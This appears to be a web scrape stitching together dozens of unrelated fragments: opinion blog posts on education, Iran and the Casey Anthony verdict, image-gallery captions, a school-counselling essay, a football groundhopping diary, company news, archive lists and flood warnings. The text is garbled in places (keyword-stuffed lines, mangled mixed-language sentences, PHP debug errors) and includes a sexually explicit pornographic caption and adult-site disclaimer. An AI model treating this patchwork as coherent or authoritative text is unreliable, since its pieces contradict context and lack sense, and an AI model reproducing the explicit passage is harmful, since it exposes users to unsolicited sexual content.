If we accept Hanushek’s numbers and dismiss the lowest-performing 5 percent of teachers without hiring replacements, a class of 20 would then increase by just one student. Ask any parent if he’d rather have his child in a class of 21 kids with a high-performing educator or in a class of 20 with a mediocre one. With only a finite amount of money available for education, fewer working teachers would free up funds for increased salaries, books, computers, or whatever the individual school district chooses. And, as a bonus, retaining fewer teachers would also mean fewer central-office bureaucrats and a smaller pension-fund burden on cash-strapped states.
Unfortunately, no politician is going to take up the rallying cry of "bigger classes for our schools." Already locked in a death battle with public employee unions, governors are afraid of handing their adversaries a weapon that might impede (or even reverse) current reform efforts. Indeed, most governors believe the problem will somehow take care of itself; with districts forced to lay off teachers because of funding problems, class size will almost certainly increase.
But not without a fight. As teacher layoffs begin to take effect, expect even more stories about harried teachers trying to manage unwieldy classes, and ensure that all students are actually learning. It's a sure bet that coverage won't talk about how much class rolls have shrunk over the last 30 years, and expected increases are modest, at best. Instead, reporters will go for the heart-strings, claiming that indifferent politicians (read: Republicans) are sacrificing our schools to help their wealthy friends.
It's a baseless charge; without reform of public education and employee pension plans, many school districts are facing bankruptcy in the coming years. What's more heartless: teaching kids in slightly larger classes, or shuttering the entire district?
Still, the argument advanced by the teacher's union and their Democratic allies does have some traction. At a Navy event, I recently met a Petty Officer Second Class, stationed in New Jersey. She has four school-age children; a civilian husband who's looking for work, and an unsold home at their last duty station. In her current financial situation, the Petty Officer qualified for food stamps. While acknowledging that Governor Chris Christie's reforms are needed, she worried about the loss of art and music programs at her children's schools. I'm sure she would be sympathetic to New Jersey teachers and their arguments about increased class size.
Research affirms that our schools can survive with slightly larger classes. Fact is, we have no other choice.
Meanwhile, there's the matter of getting rid of teachers who shouldn't be in the classroom. In today's edition of the New York Post, there's the story of Yvonne Chalom, a teacher in the city school system who was recently dismissed for leaving threatening messages on the voicemail of three administrators at Murry Bergtraum High School where she taught Spanish. Getting rid of Ms. Chalom, 49, took eight years and more than $1 million in taxpayer dollars.
...From Elise Jordan, a National Security Council staffer writing at National Review on-line. Her column is devoted to something we've written about extensively in recent months: the Obama Administration's absolute refusal to confront Iran, on issues ranging from human rights abuses, to its nuclear weapons program. A few excerpts:
Iran is feeling pretty confident these days. The Americans are leaving Afghanistan and leaving Iraq, while showing just how far they’re not willing to go in Libya. A handful of former enemies in the Sunni Arab world — regimes that for decades acted as a pro-U.S. counterweight to Iran’s regional ambitions — have fallen in the wake of the Middle East’s democratic uprising. Others Gulf states with significant Shiite populations, such as Bahrain and Saudi Arabia, seem a little shaky. Tehran, meanwhile, rockets ahead.
Literally. Last week, the U.K. foreign minister announced that Iran had tested missiles and rockets that can “deliver a nuclear payload.” The recipients of that delivery, by the way, would be Israel and Europe. It was a not-so-subtle message to the ever-feckless international community: We’re going to get a nuclear weapon. Your sanctions have not worked. There’s nothing you can — or will — do about it.
Sound (or no sound, as it were) familiar? Flashback to 2009: The Green Revolution sweeps the streets of Tehran. Ahmadinejad and his thugs brutally crack down on protesters of Ahmadinejad’s contested electoral victory. The White House decides to keep quiet. The same pattern unfolded following the democratic revolutions of this past season.
It’s not just “leading from behind,” as one of Obama’s advisers memorably described his leadership style, but speaking from the rear. The result? Tehran survived its brush with democracy, further emboldening the regime. Now they see the Arab Spring as another great opportunity. “[Iran] didn’t create the Arab Spring or start it, but they are clearly trying to exploit it wherever they can,” Secretary of Defense Robert Gates has observed.
To be fair, Mr. Obama and his team aren't the first administration to kick the Iranian can down the road. Pre-occupied with the wars in Iraq and Afghanistan, the Bush White House was more than happy to let diplomacy "run its course," a process that resulted in wasted years--and Iranian progress towards a nuclear weapon--while European negotiators labored in vain to dissuade Tehran.
Now, we're literally at the point of no return. Iranian efforts to join the nuclear club will soon hit pay dirt, and its campaign to prop up it allies in Syria and Lebanon appears to be working as well. The mullahs and Ahmadinejad are on the march; our remaining allies in the region are getting very nervous and its time for a new approach to Iran. And the response from the White House?
If you need proof that our justice system is broken, look no further than the verdict just rendered in the Casey Anthony trial.
In case you missed it, a Florida jury found Ms. Anthony not guilty of murdering her two-year-old child in 2008. Not guilty on manslaughter charges. Not guilty on various counts of aggravated child abuse. In fact, she was only found guilty on charges of lying to a police officer. While she may receive a short sentence for that crime, it's worth remembering that "Tot Mom" (as Nancy Grace calls her) has already spent three years in jail. With credit for time already served, she may walk out of the courtroom on Thursday morning, a free woman.
But even if she spends a few more months in the slammer, Casey Anthony will emerge from jail a rich woman. Book and movie offers will be pouring in (in fact, they already are) and forget about those laws that prevent the accused from profiting from a crime. There are plenty of ways to structure a deal to avoid the statutes, and besides, she beat the rap on the most important counts.
Say what you will about the lack of DNA and fingerprints. At the end of the day, there is--as prosecutors argued--only one person who benefited from the death of that beautiful little girl. The same woman who partied while her daughter was missing, without an apparent care in the world. The same woman who created an elaborate web of lies to conceal the child's disappearance. She is the same woman who will now profit from the death of her daughter.
In From the Cold by Nate Hale is licensed under a Creative Commons Attribution-ShareAlike 4.0 Inter. Simple theme. Powered by Blogger.
Cute Elephant with Kite Swaddle Blanket Gift Ideas from Elephant Receiving Blankets, source:pinterest.com
Fox Flannel Swaddle Blanket Flannel Receiving Blanket Flannel Baby from Elephant Receiving Blankets, source:pinterest.com
Take a look at this Gray Elephant Receiving Blanket today from Elephant Receiving Blankets, source:pinterest.com
Best of Top 10 Best Receiving Blankets in 2017 Reviews from Elephant Receiving Blankets, source:pinterest.com
Quilted baby blanket Baby shower t shabby chic throw baby girl from Elephant Receiving Blankets, source:pinterest.co.uk
Fish Swaddle Blanket Double Sided Flannel Receiving Blanket Flannel from Elephant Receiving Blankets, source:pinterest.co.uk
Moose Buffalo Check Swaddle Blanket Double sided Flannel Receiving from Elephant Receiving Blankets, source:pinterest.com
Take a look at this SpaSilk 30 x 30 Pink & White Minky Dot from Elephant Receiving Blankets, source:pinterest.com
Swaddle Designs Marquisette Receiving Blanket Safari Fun Bright Blue from Elephant Receiving Blankets, source:pinterest.com
61 best Baby Blankets and Bibs by Anna Kay Quilts images on Pinterest from Elephant Receiving Blankets, source:pinterest.com
KEEP EVERYONE IN PRAYER ! many people are depressed these days so we have to make sure to lift them up in prayer !
Have toi seen the vidéos and livres called Not A Fan, meaning that toi are not a fan, but a follower of Christ? If so, do toi feel guilty in joining this club?
Does it brake your cœur, coeur when toi talk to people about God and they're like "there is no god" ?
Translation: South Sudanese President Salva Kiir reads a letter from President Abdel Fattah el-Sisi delivered by the foreign minister in Juba today.
According to the ministry statement, the two men also discussed means of enhancing South Sudan-Egypt relations and “regional issues of common concern”, including ongoing negotiations over Ethiopia‘s Grand Renaissance Dam project.
Monday’s meeting also reportedly saw an agreement signed establishing a “mechanism for political consultation” between Cairo and Juba, while Shukry also conveyed a message to Kiir – the contents of which were not disclosed – from the Egyptian president.
Since 2013, South Sudan, which seceded from Sudan following a 2011 popular referendum, has remained the scene of a bloody civil war pitting government forces against armed opposition groups.
A split between South Sudan’s President Salva Kiir and his former deputy Riek Machar escalated into a military conflict in December 2013.
Despite a 2015 peace deal signed between the two sides, the conflict – in which some 10,000 people are estimated to have been killed – remains ongoing.
This is the first MAD comic book, Issue # 1, first front page, and first story. It was published by E.C Publishing Company in the early 1950s EC, up to that point was publishing mostly horror comics (TALES FROM THE CRYPT, etc). MAD, in time, changed their directions.
The story was written by MAD's creator, editor Harvey Kurtzman and illustrated by Georgia's own, Jack Davis.
Mugo is a territory of The Grand Kingdom Territories. It is a forest but has been mostlydeforested by MugoCorp, the mining company that owns the territory.
The winding caves of Mugo that had been created by Spiders leads to the main hatchling spot of The Underworld, a spider safe haven. The caves are also home to Trolls of The Bloodwind Troll Army and their headquarters.
CRL's Sirius Series Post Caps are manufactured from powder coated cast aluminum components, and are designed to surface mount to the top of our standard 4" x 4" (102 x 102 mm) Post Kits. The surface mount caps offer a decorative look as they protect the top of the post from weather and debris. Caps install easily with self tapping/drilling screws and CRL 95C Silicone.
The Excel Hero Blog contains hundreds of hours of fascinating, and fairly advanced Excel information and almost one hundred freely downloadable workbooks.
Outside of VBA, Excel's single most powerful feature is PowerPivot, which is an official MS add-in for Excel that…
Mynda's Excel Dashboard Course is open once again and right now she is offering a 20% Discount Code: DASHThat code is…
My friends in Europe (Italy and Hungary) are on a mission to collect some frequently used regional settings from different…
The Excel Hero Academy opened registration yesterday for the 4th class ever. And just like that the enrollments came…
I am very happy to publish this guest article about the amazing first year of the Excel Hero LinkedIn…
Hello All.My name is Ian Huitson "Hui". I am quite honored that Daniel has invited me to become a regular…
The next class of the Excel Hero Academy will open on February 1, 2012!There's already a couple of hundred students…
Happy New Year to all Excel Hero readers!One of my very first posts on this blog was about the Live…
A couple of months ago, Microsoft asked me to take a new, student grades template for teachers and enhance it…
Over at the Excel Hero LinkedIn Group, I just posted a very tough Formula Challenge for converting numbers to written…
Right now the Excel Hero Academy is full to the brim with students learning how Excel really thinks.A big component…
Sample Video from EHA 2 is BelowAs of right now, over 250 students have enrolled in Excel Hero Academy 2.But…
I just received this bit of interesting news.Thanks, Corality. I'm honored.By the way, there's still six days left to enroll…
It's been 19 months since I started the Excel Hero blog.Excel Hero has grown into quite a number of operations…
I am very happy to announce that the Excel Hero Academy will be starting the 2nd group of students on…
Sometime ago, I stumbled onto an interesting narrated chart at the NY Times that told the story of Oil's price…
On July 1, 2011, I woke to a very pleasant surprise. In my inbox was a message from Microsoft congratulating…
The following definition of self-directed learning by Malcolm Knowles was retrieved from: https://ahappydiscovery.wordpress.com/2013/06/14/self-directed-learning-2/
Self-directed learning refers to a family of related approaches to education that recognize that learners need to be taught how to develop skills in the effective use of learning strategies while they are learning academic concepts and content. All students need to learn and to learn how to learn.
It is often stated that we want students to assume ownership of their learning. When students assume ownership they accept responsibility for figuring out what they want to learn, what needs to be learned and how to manage their learning processes so they result in positive outcomes. Students recognize the power of, and responsibility for, making choices about their learning that will help them be prepared for successful and fulfilling lives. Assuming ownership transforms the role of student from one that is a passive recipient of information from others to an active participant in identifying and pursuing learning outcomes that will have the greatest impact on their lives and future success.
The role of counselors and teachers is also transformed when students assume ownership of their own learning. Educators are no longer the primary source of information to be transferred to students. Rather, they are freed up to perform the roles of coaches and facilitators who guide students in their decision making and learning rather than making decisions for them. Their role goes from educator-driven to student-driven learning. Rather than being told what to do, students heuristically establish and pursue their learning goals and through self-reflection take corrective action along their learning pathways to ensure the highest level of achievement.
In order for students to assume ownership of their learning and be responsible for selecting and achieving positive outcomes, they must become self-directed learners. Self-directed individuals actively manage their own lives rather than passively following the path of least resistance. These students are cognizant of their responsibility to make critical choices, plan to achieve critical goals, and control and manage their learning in ways that maximize their potential for achievement and success.
Acquiring essential self-knowledge and learning to be self-directed are important and desirable goals for all students and should be a focus for the work of all school counselors. Through interactions with the counseling program, all students are encouraged to identify their own life directions, make academic choices consistent with these directions, and connect their classroom learning to their life goals.
As noted above, even though the focus of self-direction is on the individual, the ability to self-direct and become proficient self-directed learners develops in social contexts. We are not born into this world with the ability to self-direct. It is a learned trait. In short, other people help encourage and nurture the process leading to mastery of self-directed learning processes. School counselors have such a role by acting as guides and facilitators.
Students need help in learning how to make meaningful choices, establish achievable goals, monitor their progress and evaluate their results. Self-directed learning is a blend of independence and interdependence. The “Help Seeking” topic under the “Relationships” construct provides additional insights into the need for and benefits of students seeking help to successfully address challenges in their learning which they are not fully prepared to handle.
School counselors have multiple ways to help students become self-directed learners. First they teach students what it means to be self-directed and why it is important to their learning and success in school and life. Next they guide the transition from dependence to independence and interdependence in directing their own learning. Third, counselors remain available to guide students in making meaningful and realistic choices upon request from students or when counselors perceive that a student is struggling with finding direction and needs their help. The graphic below represents the basic areas in which school counselors can help students become self-directed learners.
Not all students are proficient as self-directed learners and will require more direct instruction and support than those who are capable of making meaningful choices and managing their own learning processes. It is the counselors’ responsibility to ascertain the capacity of their students for self-directed learning and adjust their approaches to teaching and assisting them accordingly.
Counselors are central to the process of helping students learn how to learn, plan for their future success and cope with the challenges of growing up and being prepared for entry into the postsecondary world. Regardless of what level of proficiency at self-directed learning is achieved, it is a goal of school counseling programs to help students develop strategies and skills that will enable them to become life-long learners who continue to be excited about learning, motivated to achieve throughout life and continue to effectively manage their learning processes in ways that increase their levels of achievement and fulfillment.
The Internet is a wonderful tool for accessing information on just about any topic. It has been invaluable in helping us to identify what research has demonstrated to be strongly related to students’ academic achievement and well-being, and evidence-based practices that provide concrete examples of how to translate the research findings into meaningful learning opportunities that support student development.
Staying informed about what works and does not work to help students achieve and succeed is one of the defining characteristics of a professional school counselor. Internet search engines can be used to develop a deeper understanding of the topics discussed on the CBA Website. To get you started, here are some additional resources you may find helpful. These resources, however, only scratch the surface of what is available on the Internet or in published books and articles. We encourage you to use search engines to find more resources that will increase your understanding and build your capacity to apply these ideas in your work as school counselors.
Blake Boles, in this video entitled “The Art of Self-Direction” presents a fascinating story about his journey of self-exploration and teaching kids to be self-directed learners. He has also published books on this topic.
This Ted Talk by Shelley Wright is a beautiful illustration of how her class was transformed from a traditional learning environment where the students sat in rows and the teacher imparted knowledge to one where the students conceived of and achieved a remarkable goal of raising over $20,000 to help students in Uganda. This story is a testament to what can happen when students establish their own goals, are highly motivated to succeed and self-direct their learning processes with an amazing degree of self-efficacy and sense of social justice.
This video was designed and produced by students and provides a great deal of useful information for understanding self-directed learning.
A website dedicated to self-directed learning (SDL), with a list of resources including websites, books, discussion groups, SDL readiness assessments, learning style assessments, online journals and others.
Short description of self-direction based on Knowles definition. Identifies basic steps in the process leading to self-directed learning.
We are providing a step by step guide to set up Office along with independent support service for installation and activation issues.
50 Lovely Cheap Gaming Chairs for Ps4 from Inexpensive Gaming Chairs , source:phylliswestongallery.com
Cheap Gaming Chairs for Ps4 Best Amazon Dxracer formula Series from Inexpensive Gaming Chairs , source:phylliswestongallery.com
DXRacer PC Gaming Chair RC01N Review PROS and CONS The DXRacer PC from Inexpensive Gaming Chairs , source:pinterest.com
Cheap Gaming Desk Design Decorating with Bright Chair 46 Modern from Inexpensive Gaming Chairs , source:macgda.com
L massage gaming chair massage Home office can lie down from Inexpensive Gaming Chairs , source:pinterest.com
[phpBB Debug] PHP Warning: in file [ROOT]/includes/functions.php on line 4806: Cannot modify header information - headers already sent by (output started at [ROOT]/includes/functions.php:3924)
[phpBB Debug] PHP Warning: in file [ROOT]/includes/functions.php on line 4808: Cannot modify header information - headers already sent by (output started at [ROOT]/includes/functions.php:3924)
[phpBB Debug] PHP Warning: in file [ROOT]/includes/functions.php on line 4809: Cannot modify header information - headers already sent by (output started at [ROOT]/includes/functions.php:3924)
[phpBB Debug] PHP Warning: in file [ROOT]/includes/functions.php on line 4810: Cannot modify header information - headers already sent by (output started at [ROOT]/includes/functions.php:3924)
As regular readers of this blog know, I am a huge fan of Friday night football. I'm a huge fan of any football to be honest, but especially on a Friday when I'd otherwise be winding down with a few drinks. Originally on this day I was going to be travelling to Barnton, up in Cheshire, for their North West Counties League game against Atherton Colleries. I had made plenty of good friends amongst the visitors, and it would be a good opportunity to have a catch up. But then I saw that Winchester City had a Friday night game on the same day too, with a considerably shorter distance to travel. I also knew some people that were going there, so I'd be in good company. I'd also not have to wait long to see the Colls play, as I will be seeing them in 3 weeks time when they play at Daisy Hill in a local derby, which is another Friday night game.
WINCHESTER CITY were formed in 1891, originally calling themselves Winchester Swallows FC. They have played in the Hampshire League for the most part of their history, though they have spent a few seasons in the Southern League as well. They had a best ever finish on 12th in Division 1 South in 1972, but have generally found life tough at the higher level. They had applied for promotion this season, and were doing well, sitting in 3rd, two places above where they finished last season, following relegation from the Southern League.
They have reached the FA Cup 4th Qualifying Round on a number of occasions, but not since the 1950's. In modern times they had a great season in the competition this season, getting to the 3rd Qualifying Round before losing to Conference South side Concord Rangers who went on to reach the 1st Round. The club won the FA Vase in 2004, when they beat AFC Sudbury in a game played at Birmingham City's St Andrews ground. They have won a number of local cups and were the first club of Terry Paine, the Southampton record appearance holder with 800 starts for the Saints.
On the day of the game, I had quite a hard day at work and was pretty tired when I came to finish. Though my fatigue might have been something to do with me getting very little sleep during the week. I'd had football Tuesday and Wednesday and was planning to go last night as well to the Arsenal v Crewe FA Youth Cup game at Borehamwood FC. But in the end, my brother came round and we had a Chinese takeaway with a few drinks instead. I was thinking about doing some vlogging, or at least a big video of lots of short clips joined together for the upcoming Scottish groundhop. I wanted a dinky little camera that I could just have on my person, switch on and forget about for recording atmosphere at grounds etc. So I went onto eBay and got myself a little spy camera for £6.65. It wasn't perfect either in footage quality or form factor, but it would do for now. I could have got one delivered from Poland for £3.95, but these things do not come with the best reputation and I wanted a UK seller in case things went wrong.
I spent the afternoon doing various little errands that needed tying up, before leaving at 4.15. The journey down was actually quite good for a Friday night, and save for a couple of slow bits, I made good time. On the way I was entertained by the excellent 'Two Mikes' podcast - hosted by TalkSPORT presenters Mike Parry and Mike Graham. It was it's usual fun listen and certainly made the journey go a lot quicker I arrived in Winchester at 5.35, parked up near the ground and took the 15 minute walk to Wetherspoons.
It took them a while to serve me, and then like buses, 3 members of staff came along at once. I ordered myself a flaming dragon curry and a pint of Thistly Cross cider. The pint was fantastic and bought back good memories, as the last time I had it was when I completed the 92 football league grounds at Sunderland. The curry too had a good kick to it, and both put me in a good mood. It's hard to beat Wetherspoons for value and it will always be one of my first choices. I'd prefer an independent pub that made an effort on the cider front, but if not, I will try and find a Wetherspoons. The Winchester ones was one of their better establishments for me, as my second pint was Orchard Pig Maverick, another one I'd not had for ages. Both the ones in Wycombe are very poor cider wise, only getting something decent when it is the chain wide festival in July.
I left at 6.45 and by 7 was back at my car. I got my bag and went in the ground, paying £5 entry and £1 for a programme. I then went in the club shop and got myself a book - Phil Stant, the former Cardiff striker's autobiography for £2. There were plenty of groundhoppers in attendance and I chatted to them while I waited for kick off. Jack was down for the weekend, going to Gillingham Town and Yeovil Town tomorrow and he is a hopper I have met several times before. Then I met Bashley fan Sheridan for the first time and we had a great chat with some other random people. Finally Rob, a Blackburn and Winchester fan, as well as a groundhopper came over for a chat - it was him that inspired me to complete the 92, rather than just getting pictures of the grounds, and in turn do loads of non league ones too.
I was interested to see that Dave Hook was in goal for Moneyfields. He was a well known name in non league circles, but I remember him playing against Wycombe in the FA Cup 1st Round back in the year 2000. He was 30 then, so he must be at least 44 now. Along with former Boston United keeper Paul Bastock, still turning out for St Neots Town, he is proving that age needn't be a barrier. Wycombe had an incredible run to the FA Cup Semi Final that year, before a narrow 2-1 defeat to Liverpool.
With Petersfield Town being the runaway leaders in the Wessex League, this match would go a long way to deciding who would finish in the runners up, and gain a possible promotion spot should one be available. The opening stages were a bit scrappy, with lots of strong challenges flying in, but not much in the way of goalmouth action. Winchester did take the lead however. On 20 minutes good work by Adam Roberts and Warren Bentley left Liam Robinson with a simple chance to open the scoring. The home side edged the first half, with Moneyfields mainly restricted to chances on the break
The second half was a different story though, with almost complete domination from Winchester. They doubled their lead a couple of minutes into the second half, thanks to another goal from Robinson as he followed up a shot that had initially been parried. With all the challenges flying in, a sending off was inevitable and this came to pass when Moneyfield's Conor Bailey was sent off for a late and high challenge which left his opponent in agony. This only served to strenghten the home side\s grip on the game and 2 further goals on 67 and 68 minutes sealed the game for them. Warren Bentley got the pick of them, finishing well for his 44th goal of the season and it was only visiting keeper Dave Hook that kept the score down.
It had been a good evening with some great people. The attendance of 462 was excellent too - Winchester's last 2 home attendances were 106 and 122, so it proves yet again that Friday night football is well worthy of consideration. Most clubs seem reluctant to host Friday evening kick offs, with them being few and far between. Only in Wales do they get played on a regular basis. Pretty much every example I have seen has seen a large increase in attendance, thanks to the home club getting the word out and reaping the rewards with extra revenue.
The game finished quite late, and it wasn't until 9.50 that I left. I had a good journey home, listening to Absolute 80's and then David Bowie. I made good time, getting in at 11PM. I caught up on Facebook, plus jotted down a few notes for this blog, before going to bed around half past midnight.
THE CITY GROUND has been built up over the years as the team have progressed up the leagues. Apart from one covered area on the far side, which probably holds around 200, they are all of the metal 'Arena' type stands. While these are functional, they are quite bland, but at least the club have added their name to the seated area (around 200 capacity) The other one behind the goal (around 100 capacity) is a plainer standing area. With all the open standing I reckon that it could hold around 2000 with ease.
The best thing about the ground is the club shop with as well as club merchandise has a great range of old books and programmes at cheap prices. The tea bar and clubhouse are standard football fodder and do the job. I'd recommend a pleasant 15 minute walk to the well-to-do city Centre which has a range of places to eat and drink, including one of the better Wetherspoons in the chain.
An image grab from an undated video posted to LiveLeak.com shows a Saudi executioner raising his sword before beheading a convict. (The Daily Star/LiveLeak Two Ethiopians Executed in Saudi Arabia for Murder...	Read more »
Our pool of Scrum Masters is growing and we thought it was a good time to let our latest addition provide some insight on his new...
Velocity Partners wants to give a warm welcome and announce that has hired an Agile Evangelist on a full-time basis. Bill is a...
Nelson Longa has served as a Regional Manager in our Caracas, Venezuela, office since October 2015. Previously, he managed teams and...
In this installment of a series of interviews with Velocity team leads, Principal Agile Evangelist Bob Galen talks to Melisa Cabrera...
“Man is born free, responsible and with no excuses.” Meet Cristian Gohlke, Velocity Partners’ general manager for Argentina...
As our Scrum Master role becomes more popular, we want to provide additional insight to their thoughts. Here’s what Dell Boomi’s...
Agile teams work best when there are explicit agreements and policies around how the team works together. Working agreements are a...
"Agile with distributed teams" was a talk we held at the Meet Up in Medellín in the middle of August. There, Adrián Moya shared...
We are pleased to announce that our Principal Evangelist, Bill DeVoe, will be providing a lecture at the four day event, Agile 2017...
Our software has never been more at risk. It’s been reported that the average enterprise receives 10,000 security alerts per...
The session will delve into one of the main challenges organizations face when moving from a traditional methodology to an agile one...
The merger between Velocity Partners, an innovative software development company with a strong presence in Latin America, and Endava...
Velocity is proud to announce its upcoming webinar on "How to Outsource Software Development." The session will delve into the good...
Velocity Partners continues to lead the pack in emerging technologies within the developer communities around our South American...
We are proud to announce that another firm joined us to become partners in their software challenges. Velocity Partners worked...
We are proud to announce that we have incorporated a new client to our portfolio. Birchbox is a New York City-based...
The well known company dedicated to providing energy infrastructure in the north of USA, once again chose Velocity Partners to carry...
In February, we celebrated six years of partnership with MTV, five years with Kern Health Systems and four with ClearStar. We are...
Tecplot Reached New Goal in January. Tecplot, the leading developer of CFD visualization and analysis software for engineers and...
We are proud to announce that we are incorporating two new clients to our team. They are Dell-Boomi and Dealer-FX. Dell-Boomi is...
Our partner InfoTycoon launched its newest mobile app called "InfoTycoon Pro." Their Rosario-based team began development in July. I...
For the first time, a Velocity staff member (Javier Valderrama) was invited to participate as a speaker at the annual event Tableau...
Once more, Kinnser, a Home Health Care Software company visited us during the first week of October. This time around we hosted...
TransCanada, an industry leader in the energy sector is facing the challenge of releasing three different software applications for...
The new management of Polycom decided, with VP input, that visiting the Montevideo offices was the best way to show the team their...
Miitla.com is a web application that allow you to save sites like bookmarks but on the third party server. With Miitla.com you can have your bookmarks always with you. Get a bookmarklet for your browser and add sites to Miitla.com with one click without loggin in. Bookmarklet automatically get all necessary info like: url address, title and description. You can create categories and assign them to your links.
Packrati.us is a simple service that gives you the possibility of bookmarking your tweets with interesting links. It´s a service that follows your Twitter account and bookmarks the URLs to your Delicious service.
Packrati.us’s own description: “…This site provides a simple bookmarking service. We follow your Twitter feed, and whenever one of your tweets contains URLs, we add them to your Delicious bookmarks. Optionally, bookmark URLs in @replies to you. We’ll even add a delicious tag identifying the sender if you like…”
Venture Archive Select Month December 2013 October 2013 October 2012 September 2012 August 2012 July 2012 June 2012 May 2012 April 2012 March 2012 September 2010 August 2010 July 2010 June 2010 May 2010 April 2010 March 2010 February 2010 January 2010 December 2009 November 2009 October 2009 September 2009 August 2009 July 2009
window bench seat height seats with storage under diy,bay window bench seat ideas ing nz with storage ikea,bay window bench seat plans nz with storage diy,set mke srge bay window bench seats with storage seat depth diy,window bench seat building plans seats with storage es bay decorating ideas,bay window bench seat plans ikea stuva ideas,diy wood window bench seat covers seats with storage,window bench seat height under storage diy ideas,window bench seat height bay decorating ideas plans free wdow,window bench seat covers diy plans for set bse nd dd free.
In 2018, Peter Donegan was selected by a French Jury to represent Ireland to design and realise a garden in the moat of the 13th century Chateau de Peronne, known as The Historial de la Grande Guerre, in the Somme region of Northern France.
A series of Peace Gardens (Jardin de la Paix) in very historic locations there were to be created to commemorate the centenary of the end of World War 1. The gardens were to be designed and realised by 14 internationally selected garden designers.
The Irish WW1 Peace Garden of the Historial Péronne visited by President Emmanuel Macron Friday 9th November 2018 is now complete. An official Irish inauguration of the garden is set to follow in the coming weeks.
The following is the story behind the garden. Before the build of the Irish garden began is better told in this article by Anthea McTiernan of The Irish Times. Read more
The recording (below) for France Tv station Weo with Adelaide Bollart, was just as I began phase 2, of the completion of the Irish WW1 Peace Garden at Chateau de Péronne, Historial de la Grande Guerre, France.
Though an official inauguration is to be announced, the Irish Jarden de la Paix garden has was opened Tuesday 8th November 2018, in time for the Armistice Centenary.
Archives Select Month November 2018 (3) October 2018 (2) September 2018 (2) August 2018 (5) July 2018 (3) June 2018 (2) May 2018 (1) April 2018 (2) March 2018 (1) October 2017 (1) September 2017 (6) June 2017 (2) May 2017 (2) April 2017 (1) March 2017 (3) January 2017 (2) December 2016 (1) November 2016 (1) August 2016 (3) July 2016 (1) June 2016 (6) March 2016 (1) February 2016 (2) January 2016 (3) December 2015 (1) September 2015 (1) August 2015 (3) July 2015 (6) June 2015 (1) May 2015 (8) March 2015 (3) January 2015 (3) December 2014 (1) November 2014 (2) October 2014 (3) September 2014 (1) August 2014 (5) July 2014 (2) June 2014 (5) May 2014 (4) April 2014 (7) March 2014 (5) February 2014 (2) January 2014 (4) December 2013 (4) November 2013 (3) October 2013 (6) September 2013 (3) August 2013 (5) July 2013 (9) June 2013 (6) May 2013 (10) April 2013 (5) March 2013 (4) February 2013 (5) January 2013 (7) December 2012 (6) November 2012 (7) October 2012 (8) September 2012 (4) August 2012 (7) July 2012 (10) June 2012 (11) May 2012 (15) April 2012 (9) March 2012 (10) February 2012 (13) January 2012 (18) December 2011 (16) November 2011 (26) October 2011 (19) September 2011 (22) August 2011 (30) July 2011 (26) June 2011 (20) May 2011 (20) April 2011 (23) March 2011 (22) February 2011 (12) January 2011 (14) December 2010 (16) November 2010 (12) October 2010 (18) September 2010 (19) August 2010 (19) July 2010 (16) June 2010 (19) May 2010 (25) April 2010 (17) March 2010 (18) February 2010 (23) January 2010 (21) December 2009 (19) November 2009 (16) October 2009 (20) September 2009 (19) August 2009 (28) July 2009 (26) June 2009 (23) May 2009 (29) April 2009 (21) March 2009 (24) February 2009 (25) January 2009 (16) December 2008 (19) November 2008 (20) October 2008 (30) September 2008 (25) August 2008 (24) July 2008 (26) June 2008 (20) May 2008 (4) April 2008 (13) March 2008 (5) February 2008 (10) January 2008 (12) December 2007 (6) November 2007 (3) October 2007 (17) September 2007 (23) August 2007 (6)
This mature looks hot with cock in her mouth. Would love to have this pretty redhead work my boner and fill her mouth with my thick load of cum.
aimer: disney-info.info is a fully automatic adult search engine focused on free porn Images. We do not own, produce or host the Images displayed on this website. All of the Images displayed on our site are hosted by websites that are not under our control. The linked Images are automatically gathered and added into our system by our spider script.The list of related phrases is also based on surfers search queries. disney-info.info has a zero-tolerance policy against illegal pornography. We take no responsibility for the content on any website which we link to. We take no responsibility for the phrases entered by surfers. Please contact us if you have found inappropriate content.
Disney offers many items that traditionally contain milk in dairy or lactose-free options. Learning about these locations made my vacation less stressful and my tummy even more happy
...from The National Weather Service In Little Rock...the Flood Warning Continues For The Following River In Arkansas... Cache River Near Patterson Affecting Jackson And Woodruff Counties River Forecasts Are Based On Current Conditions And Rainfall Forecasted To Occur Over The Next 24 Hours. During Periods Of Flooding...evening Forecasts Are Reissued With Updated Rainfall ...Read More.
Effective: November 12, 2018 at 9:51amExpires: November 13, 2018 at 12:50amTarget Area: Jackson; Woodruff
...the Flood Warning Continues For The Following Rivers In Florida... Shoal River Near Crestview Affecting Okaloosa County. .recent Heavy Rains Have Caused Significant Rises Along The River. ...flood Warning Extended Until Friday Afternoon...the Flood Warning Continues For The Shoal River Near Crestview ...Read More.
Effective: November 12, 2018 at 1:37pmExpires: November 13, 2018 at 3:37amTarget Area: Fulton; Gwinnett
Effective: November 12, 2018 at 1:08pmExpires: November 15, 2018 at 1:00amTarget Area: Forsyth; Fulton
...the Flood Warning Continues For The Following Rivers In Illinois...kentucky... Ohio River At Shawneetown .the Water Levels On The Ohio River At Shawneetown Will Continue To Slowly Fall Throughout The Week, And Are Expected To Fall Below Flood Stage By This Afternoon. ...Read More.
Effective: November 12, 2018 at 9:48amExpires: November 12, 2018 at 8:00pmTarget Area: Gallatin; Hardin
Effective: November 12, 2018 at 10:48amExpires: November 12, 2018 at 9:00pmTarget Area: Crittenden; Union
...the Flood Warning Continues For The Following Rivers In Texas... Pine Island Bayou Near Sour Lake ...the Flood Warning Continues For The Following Rivers In Louisiana...texas.. Sabine River Near Deweyville The Flood Warning Continues For ...Read More.
Effective: November 12, 2018 at 10:04amExpires: November 13, 2018 at 12:04amTarget Area: Beauregard; Calcasieu
Effective: November 12, 2018 at 8:33amExpires: November 15, 2018 at 6:27pmTarget Area: Attala; Holmes
Effective: November 12, 2018 at 8:33amExpires: November 15, 2018 at 11:08pmTarget Area: Madison; Yazoo
...the National Weather Service In Wilmington Nc Has Issued A Flood Warning For The Following Rivers In North Carolina... Lumber Near Lumberton Affecting Robeson County The National Weather Service In Wilmington Nc Has Issued A * Flood Warning For The Lumber Near Lumberton. ...Read More.
...the Flood Warning Continues For The Following Rivers In Nebraska...south Dakota... Missouri River At Niobrara Missouri River At Springfield .the Following River Forecasts Include Forecast Precipitation Through Tonight. Any Additional Future Rains Could Affect The Crest ...Read More.
Effective: November 12, 2018 at 9:42amExpires: November 13, 2018 at 9:42amTarget Area: Calhoun; Lexington; Richland
Effective: November 12, 2018 at 9:42amExpires: November 13, 2018 at 9:42amTarget Area: Calhoun; Richland
